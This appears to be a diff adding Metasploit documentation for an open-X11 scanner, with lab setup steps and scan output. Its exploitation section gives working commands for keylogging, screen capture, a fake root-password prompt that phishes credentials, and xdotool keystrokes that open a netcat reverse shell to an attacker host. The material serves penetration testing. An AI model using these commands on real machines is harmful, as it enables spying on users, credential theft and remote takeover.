|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +X11 (X Window System) is a graphical windowing system most common on unix/linux, although implementations may be found in windows |
| 4 | +with software such as Hummingbird Exceed X Server. The service can accept connections from any users when misconfigured |
| 5 | +which is done with the command `xhost +`. |
| 6 | + |
| 7 | +### Ubuntu 10.04 |
| 8 | + |
| 9 | +1. `sudo nano /etc/gdm/gdm.schemas` |
| 10 | +2. Find: |
| 11 | + |
| 12 | + ``` |
| 13 | + <schema> |
| 14 | + <key>security/DisallowTCP</key> |
| 15 | + <signature>b</signature> |
| 16 | + <default>true</default> |
| 17 | + </schema> |
| 18 | + ``` |
| 19 | + - Change `true` to `false` |
| 20 | +
|
| 21 | +3. logout or reboot |
| 22 | +4. Verification: ```sudo netstat -antp | grep 6000``` |
| 23 | +
|
| 24 | + ``` |
| 25 | + tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 1806/X |
| 26 | + ``` |
| 27 | +
|
| 28 | +5. Now, to verify you allow ANYONE to get on X11, type: `xhost +` |
| 29 | +
|
| 30 | +### Ubuntu 12.04, 14.04 |
| 31 | +
|
| 32 | +1. `sudo nano /etc/lightdm/lightdm.conf` |
| 33 | +2. Under the `[SeatDefaults]` area, add: |
| 34 | +
|
| 35 | + ``` |
| 36 | + xserver-allow-tcp=true |
| 37 | + allow-guest=true |
| 38 | + ``` |
| 39 | +
|
| 40 | +3. logout or reboot |
| 41 | +4. Verification: ```sudo netstat -antp | grep 6000``` |
| 42 | +
|
| 43 | + ``` |
| 44 | + tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 1806/X |
| 45 | + ``` |
| 46 | +
|
| 47 | +5. Now, to verify you allow ANYONE to get on X11, type: `xhost +` |
| 48 | +
|
| 49 | +### Ubuntu 16.04 |
| 50 | +
|
| 51 | + Use the Ubuntu 12.04 instructions, however change `SeatDefaults` to `Seat:*` |
| 52 | +
|
| 53 | +### Fedora 15 |
| 54 | +
|
| 55 | +1. `vi /etc/gdm/custom.conf` |
| 56 | +2. Under the `[security]` area, add: |
| 57 | +
|
| 58 | + ``` |
| 59 | + DisallowTCP=false |
| 60 | + ``` |
| 61 | +
|
| 62 | +3. logout/reboot |
| 63 | +4. Now, to verify you allow ANYONE to get on X11, type: `xhost +` |
| 64 | +
|
| 65 | +### Solaris 10 |
| 66 | +
|
| 67 | +1. `svccfg -s svc:/application/x11/x11-server setprop options/tcp_listen = true` |
| 68 | +2. `svc disable cde-login` |
| 69 | +3. `svc enable cde-login` |
| 70 | +4. `xhost +` |
| 71 | +
|
| 72 | +## Verification Steps |
| 73 | +
|
| 74 | + 1. Install and configure X11 |
| 75 | + 2. Start msfconsole |
| 76 | + 3. Do: `use auxiliary/scanner/x11/open_x11` |
| 77 | + 4. Do: `set rhosts [IPs]` |
| 78 | + 5. Do: `run` |
| 79 | +
|
| 80 | +## Scenarios |
| 81 | +
|
| 82 | + A run against Ubuntu 14.04 (192.168.2.75), Ubuntu 16.04 (192.168.2.26), and Solaris 10 (192.168.2.32) |
| 83 | +
|
| 84 | + ``` |
| 85 | + msf > use auxiliary/scanner/x11/open_x11 |
| 86 | + msf auxiliary(open_x11) > set rhosts 192.168.2.75 192.168.2.26 |
| 87 | + rhosts => 192.168.2.75 192.168.2.26 |
| 88 | + msf auxiliary(open_x11) > run |
| 89 | + |
| 90 | + [+] 192.168.2.75:6000 - 192.168.2.75 Open X Server (The X.Org Foundation) |
| 91 | + [*] Scanned 1 of 3 hosts (33% complete) |
| 92 | + [+] 192.168.2.26:6000 - 192.168.2.26 Open X Server (The X.Org Foundation) |
| 93 | + [*] Scanned 2 of 3 hosts (66% complete) |
| 94 | + [+] 192.168.2.32:6000 - 192.168.2.32 Open X Server (Sun Microsystems, Inc.) |
| 95 | + [*] Auxiliary module execution completed |
| 96 | + ``` |
| 97 | +
|
| 98 | +## Confirming |
| 99 | +
|
| 100 | +The following are other industry tools which can also be used. |
| 101 | +
|
| 102 | +### [nmap](https://nmap.org/nsedoc/scripts/x11-access.html) |
| 103 | +
|
| 104 | +``` |
| 105 | +# nmap -p 6000 --script=x11-access 192.168.2.26,75 |
| 106 | + |
| 107 | +Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-23 13:15 EDT |
| 108 | +Nmap scan report for ubuntu-desktop-16 (192.168.2.26) |
| 109 | +Host is up (0.0021s latency). |
| 110 | +PORT STATE SERVICE |
| 111 | +6000/tcp open X11 |
| 112 | +|_x11-access: X server access is granted |
| 113 | +MAC Address: 00:0C:29:60:27:F9 (VMware) |
| 114 | + |
| 115 | +Nmap scan report for ubuntu-desktop-14 (192.168.2.75) |
| 116 | +Host is up (0.0021s latency). |
| 117 | +PORT STATE SERVICE |
| 118 | +6000/tcp open X11 |
| 119 | +|_x11-access: X server access is granted |
| 120 | +MAC Address: 00:0C:29:0E:C4:6E (VMware) |
| 121 | +``` |
| 122 | +
|
| 123 | +### xdpyinfo |
| 124 | +
|
| 125 | +This is one of the standard linux tools to get info on an X display. |
| 126 | +
|
| 127 | +``` |
| 128 | +# xdpyinfo -display 192.168.2.75:0 | head -n 5 |
| 129 | + |
| 130 | +name of display: 192.168.2.75:0 |
| 131 | +version number: 11.0 |
| 132 | +vendor string: The X.Org Foundation |
| 133 | +vendor release number: 11803000 |
| 134 | +X.Org version: 1.18.3 |
| 135 | +``` |
| 136 | +
|
| 137 | +## Exploitation |
| 138 | +
|
| 139 | +Exploiting this mis-configuration has several methods. The target can have their display viewed, keystrokes logged, and potential keyboard typed. |
| 140 | +
|
| 141 | +### Keylogging |
| 142 | +
|
| 143 | +To keylog the remote host, we use a tool called [xspy](http://tools.kali.org/sniffingspoofing/xspy) |
| 144 | +
|
| 145 | +`xspy -display [ip]:0` |
| 146 | +
|
| 147 | +### Screen Monitoring |
| 148 | +
|
| 149 | +#### Entire Display |
| 150 | +
|
| 151 | +It is possible to monitor the entire display (all windows) and view the content. |
| 152 | +
|
| 153 | + - Take a screenshot: `xwd -root -display [ip]:[display] -out xdump.xdump` |
| 154 | + - View screenshot: `display xdump.xdump` or `xwud -in xdump.xdump` |
| 155 | +
|
| 156 | +#### Specific Window |
| 157 | +
|
| 158 | +To monitor only a single window (a terminal for instance) |
| 159 | +
|
| 160 | +First, we need to determine which windows are available and what their processes are: |
| 161 | +
|
| 162 | + - `xwininfo -tree -root -display [ip]:0` |
| 163 | + |
| 164 | +Once you determine which window you want to monitor, you'll want to use the `windowID`. Now use the application `xwatchwin` |
| 165 | +
|
| 166 | + - `xwatchwin [ip]:0 -w [windowID]` |
| 167 | +
|
| 168 | +### Social Engineering |
| 169 | +
|
| 170 | +Obviously watching keystrokes is good, but we want to coax the user into providing their password. We can do this by using xterm to display a login box to the user. |
| 171 | +
|
| 172 | +This was tested against Ubuntu 12.04, 14.04, 16.04 and Solaris 10. |
| 173 | +
|
| 174 | +1. start `xspy` |
| 175 | +2. `xterm -T "Root Permission Required" -display [ip]:0 -e "echo -e -n 'root password: '; read passwd; echo 'Authentication Failure'; echo -e -n 'root password: '; read passwd"` |
| 176 | + - Notice it asks twice for the password incase of a mistyped initial password. This can also be adjusted to just say password or the real user's username |
| 177 | + - The victim's typed text by the user will not be masked (`*`) |
| 178 | +
|
| 179 | +### Direct Exploitation |
| 180 | +
|
| 181 | +Use `exploits/unix/x11/x11_keyboard_exec` |
| 182 | +
|
| 183 | +### Typing Commands |
| 184 | +
|
| 185 | +Similar to the method `exploits/unix/x11/x11_keyboard_exec` uses, its possible to use `xdotool` to run commands on the remote system. |
| 186 | +
|
| 187 | +To install `xdotool` on kali simply run `apt-get install xdotool` |
| 188 | +
|
| 189 | +Now, you can directly interact by typing commands (which appear on the users screen), an example would be running xterm and launching netcat. |
| 190 | +
|
| 191 | +For this scenario we run a simple reverse netcat to 192.168.2.9:80 |
| 192 | +
|
| 193 | +``` |
| 194 | +xdotool key alt+F2 |
| 195 | +xdotool key x t e r m |
| 196 | +xdotool key KP_Enter |
| 197 | +xdotool key n c space 1 9 2 period 1 6 8 period 2 period 9 space 8 0 space minus e space slash b i n slash b a s h KP_Enter |
| 198 | +``` |
0 commit comments